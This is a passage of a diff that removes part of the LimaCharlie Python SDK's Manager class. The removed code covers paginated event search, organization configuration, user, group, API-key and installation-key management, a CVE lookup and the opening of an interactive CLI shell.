-        search_url = self._getSearchUrl()
-
-        # Send DELETE request to cancel the search
-        return self._apiCall( 'search/%s' % ( query_id, ), DELETE, altRoot = search_url )
-
-    def pollSearchResults( self, query_id, token = None, max_attempts = 300, poll_interval = 2, progress_callback = None ):
-        '''Poll for search results.
-
-        Args:
-            query_id (str): the query ID returned from initiateSearch.
-            token (str): optional pagination token to get next page of results.
-            max_attempts (int): maximum number of polling attempts (default: 300).
-            poll_interval (int): seconds to wait between poll attempts (default: 2).
-            progress_callback (function): optional callback function called on each poll attempt.
-
-        Returns:
-            Dict with completed (bool), nextPollInMs (int), results (list), nextToken (str), and error (str, if any).
-        '''
-        # Get the Search API URL
-        search_url = self._getSearchUrl()
-
-        attempts = 0
-        while attempts < max_attempts:
-            attempts += 1
-
-            # Build the query parameters
-            queryParams = {}
-            if token is not None and token != '':
-                queryParams['token'] = token
-
-            # Poll the search endpoint
-            data = self._apiCall( 'search/%s' % ( query_id, ), GET, queryParams = queryParams, altRoot = search_url )
-
-            # Check if the search is completed
-            if data.get( 'completed', False ):
-                return data
-
-            # Check for error
-            if data.get( 'error', None ) is not None:
-                return data
-
-            # Call progress callback if provided
-            if progress_callback is not None:
-                progress_callback()
-
-            # Wait before next poll
-            next_poll_ms = data.get( 'nextPollInMs', poll_interval * 1000 )
-            wait_time = max( next_poll_ms / 1000.0, poll_interval )
-            time.sleep( wait_time )
-
-        # Max attempts exceeded
-        raise LcApiException( 'Max polling attempts exceeded for query %s' % ( query_id, ) )
-
-    def executeSearch( self, query, start_time, end_time, stream = None, query_id = None, resume_token = None, max_poll_attempts = 300, poll_interval = 2, progress_callback = None, on_query_initiated = None, on_page_completed = None ):
-        '''Execute a complete search operation with automatic pagination.
-
-        This is a convenience method that initiates a search, polls for completion,
-        and automatically handles pagination to retrieve all results. Supports
-        resumption from checkpoints and progress tracking via callbacks.
-
-        Parameters:
-            query (str): the search query to execute (e.g., "event_type = NEW_PROCESS").
-            start_time (int): the start time in epoch seconds for the search.
-            end_time (int): the end time in epoch seconds for the search.
-            stream (str, optional): stream name to search (e.g., "event", "detect", "audit").
-            query_id (str, optional): existing query_id to resume (skips initiation if provided).
-            resume_token (str, optional): pagination token to resume from a specific page.
-            max_poll_attempts (int): maximum polling attempts per page (default: 300).
-            poll_interval (int): seconds to wait between poll attempts (default: 2).
-            progress_callback (function, optional): callback called on each poll attempt.
-                                                   Signature: progress_callback()
-            on_query_initiated (function, optional): callback called with query_id when search starts.
-                                                     Signature: on_query_initiated(query_id: str)
-            on_page_completed (function, optional): callback called after each page.
-                                                    Signature: on_page_completed(page_number: int, next_token: str|None)
-                                                    Use this to persist pagination state for resumption on failure.
-
-        Return:
-            Generator yielding result objects from all pages.
-
-            Each result object contains:
-                - type (str): Result type ("events", "facets", or "timeline")
-                - rows/facets/timeseries (list): Data based on type
-                - _page_number (int): Page number this result came from
-                - _first_of_type_in_page (bool): True if first of this type in page
-                - _billing_stats (dict): Billing statistics if available
-                - nextToken (str, optional): Token for next page (in last result only)
-
-        Usage Examples:
-            # Example 1: Basic search
-            >>> from limacharlie import Manager
-            >>> manager = Manager()
-            >>> for result in manager.executeSearch(
-            ...     "event_type = NEW_PROCESS",
-            ...     start_time=1733990000,
-            ...     end_time=1734076400
-            ... ):
-            ...     if result['type'] == 'events':
-            ...         for event in result['rows']:
-            ...             print(event)
-
-            # Example 2: Search with progress tracking
-            >>> def show_progress():
-            ...     print(".", end="", flush=True)
-            >>> for result in manager.executeSearch(
-            ...     "* | * | *",
-            ...     start_time,
-            ...     end_time,
-            ...     progress_callback=show_progress
-            ... ):
-            ...     process(result)
-
-            # Example 3: Pagination persistence for resumption
-            >>> import json
-            >>> state = {'query_id': None, 'page': 0, 'token': None}
-            >>>
-            >>> def on_initiated(qid):
-            ...     state['query_id'] = qid
-            ...     with open('state.json', 'w') as f:
-            ...         json.dump(state, f)
-            >>>
-            >>> def on_page(page_num, next_token):
-            ...     state['page'] = page_num
-            ...     state['token'] = next_token
-            ...     with open('state.json', 'w') as f:
-            ...         json.dump(state, f)
-            ...     print(f"✓ Saved page {page_num}")
-            >>>
-            >>> try:
-            ...     for result in manager.executeSearch(
-            ...         "event_type = DETECTION",
-            ...         start_time,
-            ...         end_time,
-            ...         on_query_initiated=on_initiated,
-            ...         on_page_completed=on_page
-            ...     ):
-            ...         process(result)
-            ... except KeyboardInterrupt:
-            ...     print("Interrupted! Run again to resume from page", state['page'])
-
-            # Example 4: Resume from saved state
-            >>> with open('state.json') as f:
-            ...     state = json.load(f)
-            >>> print(f"Resuming from page {state['page']}...")
-            >>> for result in manager.executeSearch(
-            ...     "event_type = DETECTION",  # Same query
-            ...     start_time,                 # Same time range
-            ...     end_time,
-            ...     query_id=state['query_id'], # Resume with saved query_id
-            ...     resume_token=state['token'] # Resume from saved token
-            ... ):
-            ...     process(result)
-
-            # Example 5: Extract billing stats
-            >>> total_bytes = 0
-            >>> total_events = 0
-            >>> for result in manager.executeSearch(query, start, end):
-            ...     stats = result.get('_billing_stats', {})
-            ...     if stats:
-            ...         total_bytes = stats.get('bytesScanned', total_bytes)
-            ...         total_events = stats.get('eventsScanned', total_events)
-            >>> print(f"Scanned {total_bytes} bytes, {total_events} events")
-
-            # Example 6: Stream-specific search
-            >>> for result in manager.executeSearch(
-            ...     "mtd.event_type = DETECTION",
-            ...     start_time,
-            ...     end_time,
-            ...     stream="detect"  # Only search detection stream
-            ... ):
-            ...     process(result)
-
-            # Example 7: Handle different result types
-            >>> for result in manager.executeSearch(query, start, end):
-            ...     result_type = result['type']
-            ...     if result_type == 'events':
-            ...         events = result['rows']
-            ...         print(f"Got {len(events)} events")
-            ...     elif result_type == 'facets':
-            ...         facets = result['facets']
-            ...         print(f"Got {len(facets)} facets")
-            ...     elif result_type == 'timeline':
-            ...         timeline = result['timeseries']
-            ...         print(f"Got {len(timeline)} timeline entries")
-
-        Notes:
-            - Results are yielded as they become available (streaming)
-            - Pagination is handled automatically
-            - The generator maintains connection and polls until completion
-            - Use query_id + resume_token to resume interrupted searches
-            - Progress callbacks enable UI updates and monitoring
-            - Billing stats are cumulative and updated with each page
-            - Results are sorted by type within each page: timeline → facets → events
-        '''
-        # Initiate the search if query_id not provided
-        if query_id is None:
-            init_response = self.initiateSearch( query, start_time, end_time, paginated = True, stream = stream )
-            query_id = init_response.get( 'queryId', None )
-            if query_id is None:
-                raise LcApiException( 'Failed to initiate search: missing queryId in response' )
-
-            # Call the on_query_initiated callback if provided
-            if on_query_initiated is not None:
-                on_query_initiated( query_id )
-
-        # Poll for results and handle pagination
-        token = resume_token  # Start from resume_token if provided
-        page_number = 0
-        while True:
-            # Poll for this page
-            poll_response = self.pollSearchResults( query_id, token = token, max_attempts = max_poll_attempts, poll_interval = poll_interval, progress_callback = progress_callback )
-
-            # Check for error
-            if poll_response.get( 'error', None ) is not None:
-                raise LcApiException( 'Search query failed: %s' % ( poll_response['error'], ) )
-
-            # Increment page number
-            page_number += 1
-
-            # Get results and sort by type (timeline, facets, events)
-            results = poll_response.get( 'results', [] )
-
-            # Define type ordering (timeline first, then facets, then events)
-            type_order = { 'timeline': 0, 'facets': 1, 'events': 2 }
-            results.sort( key = lambda r: type_order.get( r.get( 'type', 'events' ), 3 ) )
-
-            # Track which types we've seen in this page for first-marker
-            seen_types = set()
-
-            # Extract nextToken from the LAST result object (not from top-level response)
-            next_token = None
-            if len( results ) > 0:
-                last_result = results[-1]
-                next_token = last_result.get( 'nextToken', None )
-
-            # Yield all results from this page with metadata
-            for result in results:
-                result_type = result.get( 'type', 'events' )
-
-                # Add metadata for page tracking, section separators, and billing stats
-                result['_page_number'] = page_number
-                result['_first_of_type_in_page'] = result_type not in seen_types
-                result['_billing_stats'] = poll_response.get( 'stats', {} )  # Include billing stats if available
-                seen_types.add( result_type )
-
-                yield result
-
-            # Call on_page_completed callback after processing this page
-            # This allows users to persist nextToken for resumption on failure
-            if on_page_completed is not None:
-                on_page_completed( page_number, next_token if next_token else None )
-
-            # Check if we have more pages - nextToken must be non-empty string
-            if next_token and isinstance( next_token, str ) and len( next_token ) > 0:
-                token = next_token
-            else:
-                # No more pages
-                break
-
-    def serviceRequest( self, serviceName, data, isAsynchronous = False, isImpersonate = False ):
-        '''Issue a request to a Service.
-
-        Args:
-            serviceName (str): the name of the Service to task.
-            data (dict): JSON data to send to the Service as a request.
-            isAsynchronous (bool): if set to False, wait for data from the Service and return it.
-            isImpersonate (bool): if set to True, request the Service impersonate the caller.
-        Returns:
-            Dict with general success, or data from Service if isSynchronous.
-        '''
-        req = {
-            'request_data' : base64.b64encode( json.dumps( data ).encode() ),
-            'is_async' : isAsynchronous,
-        }
-        if isImpersonate:
-            # To make sure we have as fresh a JWT as possible,
-            # always do a refresh.
-            self._refreshJWT()
-            req[ 'jwt' ] = self._jwt
-        data = self._apiCall( 'service/%s/%s' % ( self._oid, serviceName ), POST, req )
-        return data
-
-    def replicantRequest( self, *args, **kwargs ):
-        # Maintained for backwards compatibility post rename replicant => service.
-        return self.serviceRequest( *args, **kwargs )
-
-    def extensionRequest( self, extensionName: str, action: str, data: dict[str, Any], isImpersonate: bool = False ) -> dict[str, Any]:
-        '''Issue a request to an Extension.
-
-        Args:
-            extensionName (str): the name of the Extension to task.
-            data (dict): JSON data to send to the Extension as a request.
-            isImpersonate (bool): if set to True, request the Service impersonate the caller.
-        Returns:
-            Dict with general success.
-        '''
-        from limacharlie.Extensions import Extension
-        return Extension( self ).request( extensionName, action, data, isImpersonated = isImpersonate )
-
-    def getAvailableServices( self ):
-        '''Get the list of Services currently available.
-
-        Returns:
-            List of Service names.
-        '''
-        data = self._apiCall( 'service/%s' % ( self._oid, ), GET )
-        return data.get( 'replicants', None )
-
-    def getAvailableReplicants( self ):
-        # Maintained for backwards compatibility post rename replicant => service.
-        return self.getAvailableServices()
-
-    def getOrgConfig( self, configName ):
-        '''Get the value of a per-organization config.
-
-        Args:
-            configName (str): name of the config to get.
-        Returns:
-            String value of the configuration.
-        '''
-        data = self._apiCall( 'configs/%s/%s' % ( self._oid, configName ), GET )
-        return data.get( 'value', None )
-
-    def setOrgConfig( self, configName, value ):
-        '''Set the value of a per-organization config.
-
-        Args:
-            configName (str): name of the config to get.
-            value (str): value of the config to set.
-        '''
-        data = self._apiCall( 'configs/%s/%s' % ( self._oid, configName ), POST, {
-            'value' : value,
-        } )
-        return data
-
-    def getOrgURLs( self ):
-        '''Get the URLs used by various resources in the organization.
-
-        Returns:
-            Dictionary of resource types to URLs.
-        '''
-        data = self._apiCall( 'orgs/%s/url' % ( self._oid, ), GET, isNoAuth = True )
-        return data.get( 'url', None )
-
-    def getIngestionKeys( self ):
-        '''Get the Ingestion keys associated to this organization.
-
-        Returns:
-            Dictionary of the Ingestion keys.
-        '''
-        data = self._apiCall( 'insight/%s/ingestion_keys' % ( self._oid, ), GET )
-        return data.get( 'keys', None )
-
-    def setIngestionKey( self, name ):
-        '''Set (or reset) an Ingestion key.
-
-        Args:
-            name (str): name of the Ingestion key to set.
-        Returns:
-            Dictionary with the key name and value.
-        '''
-        data = self._apiCall( 'insight/%s/ingestion_keys' % ( self._oid, ), POST, {
-            'name' : name,
-        } )
-        return data
-
-    def delIngestionKey( self, name ):
-        '''Delete an Ingestion key.
-
-        Args:
-            name (str): name of the Ingestion key to delete.
-        '''
-        data = self._apiCall( 'insight/%s/ingestion_keys?name=%s' % ( self._oid, name ), DELETE, {} )
-        return data
-
-    def configureUSPKey( self, name, parse_hint = '', format_re = '' ):
-        '''Set the USP configuration of an Ingestion key.
-
-        Args:
-            name (str): name of the Ingestion key to configure.
-
-        Returns:
-            Dictionary with the key name and value.
-        '''
-        data = self._apiCall( 'insight/%s/ingestion_keys/usp' % ( self._oid, ), POST, {
-            'name' : name,
-            'parse_hint' : parse_hint,
-            'format_re' : format_re,
-        } )
-        return data
-
-    def validateUSP( self, platform, hostname = None, mapping = None, mappings = None, indexing = None, text_input = None, json_input = None ):
-        '''Validate a USP (Universal Sensor Parser) configuration.
-
-        Args:
-            platform (str): parser platform type (e.g., 'text', 'json', 'cef', 'gcp', 'aws').
-            hostname (str): optional default hostname for sensors (defaults to 'validation-test').
-            mapping (dict): optional single mapping descriptor (mutually exclusive with mappings).
-            mappings (list): optional list of mapping descriptors (mutually exclusive with mapping).
-            indexing (list): optional list of indexing rules.
-            text_input (str): optional newline-separated text input (mutually exclusive with json_input).
-            json_input (list): optional pre-parsed JSON input array (mutually exclusive with text_input).
-
-        Returns:
-            Dictionary with 'results' (list of parsed events) and 'errors' (list of error strings).
-        '''
-        req = {
-            'platform' : platform,
-        }
-        if hostname is not None:
-            req[ 'hostname' ] = hostname
-        if mapping is not None:
-            req[ 'mapping' ] = mapping
-        if mappings is not None:
-            req[ 'mappings' ] = mappings
-        if indexing is not None:
-            req[ 'indexing' ] = indexing
-        if text_input is not None:
-            req[ 'text_input' ] = text_input
-        if json_input is not None:
-            req[ 'json_input' ] = json_input
-        data = self._apiCall( 'usp/validate/%s' % ( self._oid, ), POST, {}, rawBody = json.dumps( req ).encode(), contentType = 'application/json' )
-        return data
-
-    def setOrgQuota( self, quota ):
-        '''Set a new sensor quota for the organization.
-
-        Args:
-            quota (int): the new quota value.
-        '''
-        data = self._apiCall( 'orgs/%s/quota' % ( self._oid, ), POST, {
-            'quota' : int( quota ),
-        } )
-        return data
-
-    def getSubscriptions( self ):
-        '''Get the list of resources the organization is subscribed to.
-
-        '''
-        data = self._apiCall( 'orgs/%s/resources' % ( self._oid, ), GET, {} )
-        return data.get( 'resources', None )
-
-    def subscribeToResource( self, name ):
-        '''Subscribe the organization to the specific resource.
-
-        Args:
-            name (str): name of the resource like lookup/test-res.
-        '''
-        resCat, resName = name.split( '/' )
-        data = self._apiCall( 'orgs/%s/resources' % ( self._oid, ), POST, {
-            'res_cat': resCat,
-            'res_name' : resName,
-        } )
-        return data
-
-    def unsubscribeFromResource( self, name ):
-        '''Unsubscribe the organization from the specific resource.
-
-        Args:
-            name (str): name of the resource like lookup/test-res.
-        '''
-        resCat, resName = name.split( '/' )
-        data = self._apiCall( 'orgs/%s/resources' % ( self._oid, ), DELETE, {
-            'res_cat': resCat,
-            'res_name' : resName,
-        } )
-        return data
-
-    def getUsers( self ):
-        '''Get the list of users in the organization.
-
-        '''
-        data = self._apiCall( 'orgs/%s/users' % ( self._oid, ), GET, {} )
-        return data.get( 'users', None )
-
-    def addUser( self, email ):
-        '''Add a user to an organization.
-
-        Args:
-            email (str): email of the user to add.
-        '''
-        data = self._apiCall( 'orgs/%s/users' % ( self._oid, ), POST, {
-            'email' : email,
-        } )
-        return data
-
-    def removeUser( self, email ):
-        '''Remove user from an organization.
-
-        Args:
-            email (str): email of the user to remove.
-        '''
-        data = self._apiCall( 'orgs/%s/users' % ( self._oid, ), DELETE, {
-            'email' : email,
-        } )
-        return data
-
-    def getUserPermissions( self ):
-        '''Get the list of users and their permissions.
-
-        '''
-        data = self._apiCall( 'orgs/%s/users/permissions' % ( self._oid, ), GET, {} )
-        return data.get( 'user_permissions', None )
-
-    def addUserPermission( self, email, permission ):
-        '''Add a user to an organization.
-
-        Args:
-            email (str): email of the user to add.
-            permission (str): permission to add to the user.
-        '''
-        data = self._apiCall( 'orgs/%s/users/permissions' % ( self._oid, ), POST, {
-            'email' : email,
-            'perm' : permission,
-        } )
-        return data
-
-    def removeUserPermission( self, email, permission ):
-        '''Remove user from an organization.
-
-        Args:
-            email (str): email of the user to remove.
-            permission (str): permission to remove from the user.
-        '''
-        data = self._apiCall( 'orgs/%s/users/permissions' % ( self._oid, ), DELETE, {
-            'email' : email,
-            'perm' : permission,
-        } )
-        return data
-
-    def getJobs( self, startTime, endTime, limit = None, sid = None ):
-        '''Get all the jobs in an organization in a time window.
-
-        Args:
-            startTime (int): second epoch of the start of the time window.
-            endTime (int): second epoch of the end of the time window.
-            limit (int): optional maximum number of jobs to return.
-            sid (str): optionally only return jobs that relate to this sensor ID.
-        Returns:
-            a Job object.
-        '''
-        params = {
-            'start' : startTime,
-            'end' : endTime,
-            'is_compressed' : 'true',
-            'with_data' : 'false',
-        }
-        if limit is not None:
-            params[ 'limit' ] = limit
-        if sid is not None:
-            params[ 'sid' ] = sid
-        data = self._apiCall( 'job/%s' % ( self._oid, ), GET, queryParams = params )
-        data = self._unwrap( data[ 'jobs' ] )
-        data = [ Job( self, job ) for jobId, job in data.items() ]
-        return data
-
-    def getJob( self, jobId ):
-        '''Get a specific job.
-
-        Args:
-            jobId (str): job ID of the job to get.
-        Returns:
-            a Job object.
-        '''
-        job = Job( self, { 'job_id' : jobId } )
-        job.update()
-        return job
-
-    def getApiKeys( self ):
-        '''Get the list of API keys in the organization.
-
-        '''
-        data = self._apiCall( 'orgs/%s/keys' % ( self._oid, ), GET, {} )
-        return data.get( 'api_keys', None )
-
-    def addApiKey( self, keyName: str, permissions: list[str] = [], allowed_ip_range: Optional[str] = None ) -> dict[str, Any]:
-        '''Add an API key to an organization.
-
-        Args:
-            keyName (str): name of the key to add.
-            permissions (str[]): list of permissions for the key.
-        Returns:
-            the secret value of the new API key.
-        '''
-        req = {
-            'key_name' : keyName,
-            'perms' : ",".join( permissions ),
-        }
-        if allowed_ip_range:
-            req['allowed_ip_range'] = allowed_ip_range
-        data = self._apiCall( 'orgs/%s/keys' % ( self._oid, ), POST, req )
-        return data
-
-    def removeApiKey( self, keyHash: str ):
-        '''Remove an API key from an organization.
-
-        Args:
-            keyHash (str): key hash of the key to remove.
-        '''
-        data = self._apiCall( 'orgs/%s/keys' % ( self._oid, ), DELETE, {
-            'key_hash' : keyHash,
-        } )
-        return data
-
-    def exportSensorList( self ):
-        '''Perform a bulk export of the entire sensor list.
-
-        Returns:
-            a dictionary of sensors with their information and tags.
-        '''
-        data = self._apiCall( 'export/%s/sensors' % ( self._oid, ), POST, {} )
-        return data
-
-    def createNewOrg( self, name, location, template = None ):
-        '''Request the creation of a new organization.
-
-        Args:
-            name (str): organization name.
-            location (str): location where the organization is created.
-            template (str): optional yaml template to initialize the new organization with.
-        Returns:
-            dict of info on new organization.
-        '''
-        req = {
-            'name' : name,
-            'loc' : location,
-        }
-        if template is not None:
-            req[ 'template' ] = template
-        data = self._apiCall( 'orgs/new', POST, req )
-        return data
-
-    def deleteOrg( self, oid, withConfirmation = None ):
-        '''Request the deletion of an organization.
-
-        Deleting an organization means the total and unrecoverable deletion of ALL data associated.
-
-        This API is used in 2 steps:
-        - Call this API without any "withConfirmation" value specified to get a confirmation token.
-        - Using the confirmation token returned, call the same API with the token. Tokens are valid for 1 minute.
-
-        Args:
-            oid (str): the organization id to delete.
-            withConfirmation (str): optional confirmation value returned by the call to the API without it.
-        Returns:
-            dict of info on new organization.
-        '''
-        if withConfirmation is None:
-            return self._apiCall( 'orgs/%s/delete' % ( oid, ), GET, {} )
-        return self._apiCall( 'orgs/%s/delete' % ( oid, ), DELETE, {
-            'confirmation' : withConfirmation,
-        } )
-
-    def getGroups( self ):
-        '''Get all groups this User has access to as an owner.
-
-        '''
-        data = self._apiCall( 'groups', GET, {} )
-        return data.get( 'groups', None )
-
-    def createGroup( self, name ):
-        '''Create a new group.
-
-        Args:
-            name (str): group name.
-        '''
-        return self._apiCall( 'groups', POST, {
-            'name': name,
-        } )
-
-    def getGroup( self, groupId ):
-        '''Get the details about a specific group.
-
-        Args:
-            groupId (str): group id.
-        Returns:
-            dict of group details
-        '''
-        data = self._apiCall( 'groups/%s' % ( groupId, ), GET, {} )
-        return data.get( 'group', None )
-
-    def deleteGroup( self, groupId ):
-        '''Delete a specific group.
-
-        Args:
-            groupId (str): group id.
-        '''
-        return self._apiCall( 'groups/%s' % ( groupId, ), DELETE, {} )
-
-    def addGroupOwner( self, groupId, ownerEmail ):
-        '''Add a new owner to a group.
-
-        Args:
-            groupId (str): group id.
-            ownerEmail (str): email to add.
-        '''
-        return self._apiCall( 'groups/%s/owners' % ( groupId, ), POST, {
-            'member_email' : ownerEmail,
-        } )
-
-    def removeGroupOwner( self, groupId, ownerEmail ):
-        '''Remove an owner from the group.
-
-        Args:
-            groupId (str): group id.
-            ownerEmail (str): email to remove.
-        '''
-        return self._apiCall( 'groups/%s/owners' % ( groupId, ), DELETE, {
-            'member_email' : ownerEmail,
-        } )
-
-    def addGroupMember( self, groupId, memberEmail ):
-        '''Add a User as a member of a group.
-
-        Args:
-            groupId (str): group id.
-            memberEmail (str): email to add.
-        '''
-        return self._apiCall( 'groups/%s/users' % ( groupId, ), POST, {
-            'member_email' : memberEmail,
-        } )
-
-    def removeGroupMember( self, groupId, memberEmail ):
-        '''Remove a User from a group.
-
-        Args:
-            groupId (str): group id.
-            memberEmail (str): email to remove.
-        '''
-        return self._apiCall( 'groups/%s/users' % ( groupId, ), DELETE, {
-            'member_email' : memberEmail,
-        } )
-
-    def setGroupPermissions( self, groupId, permissions = [] ):
-        '''Set the permissions for Users in the group.
-
-        Args:
-            groupId (str): group id.
-            permissions (list of str): list of permissions.
-        '''
-        return self._apiCall( 'groups/%s/permissions' % ( groupId, ), POST, {
-            'perm' : permissions,
-        } )
-
-    def getGroupLogs( self, groupId ):
-        '''Get the audit logs for a group.
-
-        Args:
-            groupId (str): group id.
-        Returns:
-            list of audit entries
-        '''
-        data = self._apiCall( 'groups/%s/logs' % ( groupId, ), GET, {} )
-        return data.get( 'logs', None )
-
-    def addGroupOrg( self, groupId, oid ):
-        '''Add an Org to a group.
-
-        Args:
-            groupId (str): group id.
-            oid (str): organization id to add.
-        '''
-        return self._apiCall( 'groups/%s/orgs' % ( groupId, ), POST, {
-            'oid' : oid,
-        } )
-
-    def removeGroupOrg( self, groupId, oid ):
-        '''Remove an Org from a group.
-
-        Args:
-            groupId (str): group id.
-            oid (str): organization id to remove.
-        '''
-        return self._apiCall( 'groups/%s/orgs' % ( groupId, ), DELETE, {
-            'oid' : oid,
-        } )
-
-    def getSchemas( self, platform = None ):
-        '''Get the list of all Schemas available for the Organization.
-
-        Args:
-            platform (str): optional platform name to filter the event types by.
-
-        Returns:
-            a dict containing the list of available schemas.
-        '''
-        params = None
-        if platform is not None:
-            params = {
-                'platform' : platform,
-            }
-        return self._apiCall( 'orgs/%s/schema' % self._oid, GET, queryParams = params )
-
-    def getSchema( self, name ):
-        '''Get a specific Schema Definition.
-
-        Args:
-            name (str): name of the schema to get (e.g. 'evt:DNS_REQUEST').
-
-        Returns:
-            a dict containing the schema definition.
-        '''
-        return self._apiCall( 'orgs/%s/schema/%s' % ( self._oid, urlescape( name, safe = '' ) ), GET )
-
-    def resetSchemas( self ):
-        '''Reset the Schema Definition for all Schemas in an Organization.
-        '''
-
-        req = {}
-
-        resp = self._apiCall( 'orgs/%s/schema' % self._oid, DELETE, queryParams = req )
-        return resp
-
-    def setSensorVersion( self, isFallbackVersion = False, isSleepVersion = False, specificVersion = None ):
-        '''Set the sensor version for an Organization.
-
-        Args:
-            isFallbackVersion (bool): use the "stable" version.
-            isSleepVersion (bool): set sensors in dormant mode.
-            specificVersion (str): set a specific sensor version.
-        '''
-
-        req = {
-            'is_fallback' : 'true' if isFallbackVersion else 'false',
-            'is_sleep' : 'true' if isSleepVersion else 'false',
-        }
-        if specificVersion is not None:
-            req[ 'specific_version' ] = specificVersion
-
-        resp = self._apiCall( 'modules/%s' % self._oid, POST, queryParams = req )
-        return resp
-
-    def get_installation_keys( self, ):
-        '''Get all installation keys for the Organization.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'installationkeys/%s' % self._oid, GET )
-
-    def get_installation_key( self, iid ):
-        '''Get a single installation key by ID.
-
-        Args:
-            name (str): installation key id to get.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'installationkeys/%s/%s' % ( self._oid, iid ), GET )
-
-    def create_installation_key( self, tags, desc, iid = None, quota = None, use_public_root_ca = False ):
-        '''Create an installation key.
-
-        Args:
-            tags (list): list of tags.
-            desc (str): description for the installation key.
-            iid (str): optional IID to overwrite (update).
-            quota (int): optional number of enrollments a key can perform.
-            use_public_root_ca (bool): optionally make sensors enrolling with this key use non-pinned SSL certificate going to public Root CAs.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        req = {
-            'tags' : tags,
-            'desc' : desc,
-            'use_public_root_ca' : 'true' if use_public_root_ca else 'false',
-        }
-        if iid is not None:
-            req[ 'iid' ] = str( iid )
-        if quota is not None:
-            req[ 'quota' ] = str( quota )
-
-        return self._apiCall( 'installationkeys/%s' % self._oid, POST, req )
-
-    def delete_installation_key( self, iid ):
-        '''Delete an installation key.
-
-        Args:
-            iid (str): installation key id.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'installationkeys/%s' % self._oid, DELETE, {
-            'iid' : iid,
-        } )
-
-    def getUsageStats( self ):
-        '''Get general usage stats for the org.
-
-        Args:
-            tags (list): list of tags.
-            desc (str): description for the installation key.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'usage/%s' % self._oid, GET )
-
-    def getOntology( self ):
-        '''Get the LimaCharlie ontology.
-
-        Returns:
-            dict with various ontology components.
-        '''
-
-        return self._apiCall( 'ontology', GET )
-
-    def getEDREventList( self ):
-        '''Get a list of all possible LimaCharlie EDR events.
-
-        Returns:
-            dict with the various events and IDs.
-        '''
-
-        return self._apiCall( 'events', GET )
-
-    def testTransform( self, transform, data ):
-        '''Test a transform against a piece of data.
-
-        Returns:
-            The transformed data.
-        '''
-
-        resp = self._apiCall( 'test_transform', POST, {}, queryParams = {
-            'transform' : json.dumps( transform ),
-            'test_data' : json.dumps( data ),
-        } )
-        return resp
-
-    def getRuntimeMetadata( self, entity_type = None, entity_name = None ):
-        '''Get the runtime metadata for entities in an org.
-
-        Returns:
-            runtime metdata.
-        '''
-        data = {}
-        if entity_type is not None:
-            data[ 'entity_type' ] = entity_type
-        if entity_name is not None:
-            data[ 'entity_name' ] = entity_name
-
-        return self._apiCall( 'runtime_mtd/%s' % ( self._oid, ), GET, queryParams = data )
-
-    def renameOrg( self, newName ):
-        '''Rename the existing org.
-
-        Args:
-            tags (str): the new org name.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'orgs/%s/name' % self._oid, POST, queryParams = {
-            'name' : newName,
-        } )
-
-    def checkOrgNameAvailability( self, newName ):
-        '''Check if an org name can be used for a new org.
-
-        Args:
-            tags (str): the org name.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-
-        return self._apiCall( 'orgs/new', GET, queryParams = {
-            'name' : newName,
-        } )
-
-    def getMITREReport( self ):
-        '''Get the MITRE report
-
-        '''
-        data = self._apiCall( 'mitre/%s' % ( self._oid, ), GET, {} )
-        return data
-
-    def getOrgErrors( self ):
-        '''Get the error log for the organization.
-
-        Returns:
-            a list of error objects with component, error, oid, and ts fields.
-        '''
-        data = self._apiCall( 'errors/%s' % ( self._oid, ), GET, {} )
-        return data.get( 'errors', None )
-
-    def dismissOrgError( self, component ):
-        '''Dismiss a specific error for the organization.
-
-        Args:
-            component (str): component name of the error to dismiss.
-
-        Returns:
-            the REST API response (JSON).
-        '''
-        return self._apiCall( 'errors/%s/%s' % ( self._oid, urlescape( component, safe = '' ) ), DELETE, {} )
-
-    def inviteUser( self, email ):
-        '''
-        Invite a user to LimaCharlie.
-
-        Args:
-            email (str): Email of the user to invite.
-        '''
-        data = self._apiCall( 'invite/user', POST, { "user_email": email } )
-        return data
-
-
-    def inviteUser( self, email ):
-        '''Invite a user to limacharlie.io.
-
-        Args:
-            email (str): the email of the user to invite.
-        '''
-        return self._apiCall( 'invite/user', POST, {
-            'user_email' : email,
-        } )
-
-    def get_cve_list( self, product, version, include_details = False ):
-        '''Get the list of CVEs.
-
-        Returns:
-            the list of CVEs.
-        '''
-        return self._apiCall( 'cves/%s/%s' % ( urlescape( product, safe = '' ), urlescape( version, safe = '' ) ), GET, queryParams = {
-            'include_details' : 'true' if include_details else 'false',
-        }, altRoot = 'https://vulnerability-db-service-usa-1-532932106819.us-central1.run.app/' )
-
-def _eprint( msg ):
-    sys.stderr.write( msg )
-    sys.stderr.write( "\n" )
-
-def _report_errors( func ):
-    @wraps( func )
-    def silenceit( *args, **kwargs ):
-        try:
-            return func( *args, **kwargs )
-        except:
-            _eprint( traceback.format_exc() )
-            return None
-    return( silenceit )
-
-class LCIOShell ( cmd.Cmd ):
-    intro = 'Welcome to LimaCharlie.io shell.   Type help or ? to list commands.\n'
-    prompt = '(limacharlie.io) '
-
-    def __init__( self, oid, secretApiKey ):
-        cmd.Cmd.__init__( self )
-        self.sid = ''
-        self.sensor = None
-        self.inv_id = None
-        self.updatePrompt()
-        self.man = Manager( oid = oid, secret_api_key = secretApiKey )
-
-    def updatePrompt( self ):
-        self.prompt = '(limacharlie.io/%s/%s)> ' % ( self.sid, ( '' if self.inv_id is None else self.inv_id ) )
-
-    def printOut( self, data ):
-        print( json.dumps( data, indent = 4 ) )
-
-    def do_quit( self, s ):
-        '''Exit this CLI.'''
-        return True
-
-    def do_exit( self, s ):
-        '''Exit this CLI.'''
-        return True
-
-    @_report_errors
-    def do_sid( self, s ):
-        '''Set the sensor context to this SID.'''
-        if s == '':
-            self.sid = ''
-            self.sensor = None
-        try:
-            s = str( uuid.UUID( s ) )
-        except:
-            _eprint( 'Invalid SID format, should be a UUID.' )
-            return
-        self.sid = s
-        self.sensor = self.man.sensor( self.sid )
-        self.updatePrompt()
-
-    def do_inv( self, s ):
-        '''Set the current investigation id context.'''
-        if s == '':
-            self.inv_id = None
-        else:
-            self.inv_id = s
-        self.updatePrompt()
-
-    @_report_errors
-    def do_task( self, s ):
-        '''Send a task to the sensor set in current SID context.'''
-        if self.sensor is None:
-            _eprint( 'Missing sensor context, use command "sid".' )
-            return
